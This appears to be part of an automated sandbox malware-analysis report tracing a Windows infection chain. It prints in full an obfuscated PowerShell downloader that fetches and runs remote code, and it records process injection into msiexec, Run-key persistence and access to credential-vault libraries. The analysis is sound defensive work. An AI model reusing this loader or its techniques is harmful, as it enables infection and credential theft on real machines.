                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: pstorec.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: pstorec.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: Binary string: ore.pdb source: powershell.exe, 00000004.00000002.2000694205.0000000008910000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.** source: msiexec.exe, 0000000E.00000002.2241394427.0000000002857000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.*3 source: msiexec.exe, 0000000E.00000002.2241394427.000000000283A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: xqm.Core.pdbol source: powershell.exe, 00000004.00000002.2000694205.0000000008910000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: Yara match, File source: 00000004.00000002.2002956756.000000000D545000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.2002636954.0000000008EE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.1983290797.000000000606C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.1808977051.000001209006F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Prosected)$GlobAl:BiofOG = [sYsTeM.teXt.EnCOdInG]::aScIi.GeTstRING($veLuX)$GlObal:smMENe=$BIofog.subSTRing($Stes,$OveRcOnSumpTIon105)<#Morphography partiregnskab Pinnules Resupplies
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Edificant $Guldaldermaler $Styringsmidlets), (Nskerne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Desillussioner = [AppDomain]::CurrentDomain.GetAssemb
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Autodidakter138)), $Quailed).DefineDynamicModule($Perruquier, $false).DefineType($Baedekers, $nonrecurrent, [System.MulticastDelegate]
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Prosected)$GlobAl:BiofOG = [sYsTeM.teXt.EnCOdInG]::aScIi.GeTstRING($veLuX)$GlObal:smMENe=$BIofog.subSTRing($Stes,$OveRcOnSumpTIon105)<#Morphography partiregnskab Pinnules Resupplies
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. 
.hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. 
.hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP im
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 13_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8A797B push ebx; retf 2_2_00007FFD9B8A796A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8A791E push ebx; retf 2_2_00007FFD9B8A796A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04EAA70A pushfd ; iretd 4_2_04EAA731
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04EAB260 pushad ; iretd 4_2_04EAB26A
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044693D push ecx; ret 13_2_0044694D
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00451D54 push eax; ret 13_2_00451D61
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00444E71 push ecx; ret 14_2_00444E81
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00414060 push eax; ret 15_2_00414074
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00414060 push eax; ret 15_2_0041409C
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00414039 push ecx; ret 15_2_00414049
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_004164EB push 0000006Ah; retf 15_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00416553 push 0000006Ah; retf 15_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00416555 push 0000006Ah; retf 15_2_004165C4
                Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Gummicheckene
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 14_2_004047CB
                Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5955
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3935
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6972
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2810
                Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 8.3 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4228 Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6008 Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exe Thread sleep count: Count: 1181 delay: -5
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,15_2_00407898
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: bhvF678.tmp.13.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                Source: powershell.exe, 00000002.00000002.1817815417.00000120F0526000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: bhvF678.tmp.13.dr Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
                Source: Yara match File source: amsi64_6852.amsi.csv, type: OTHER
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 6852, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 3272, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3860000
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. 
.hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB 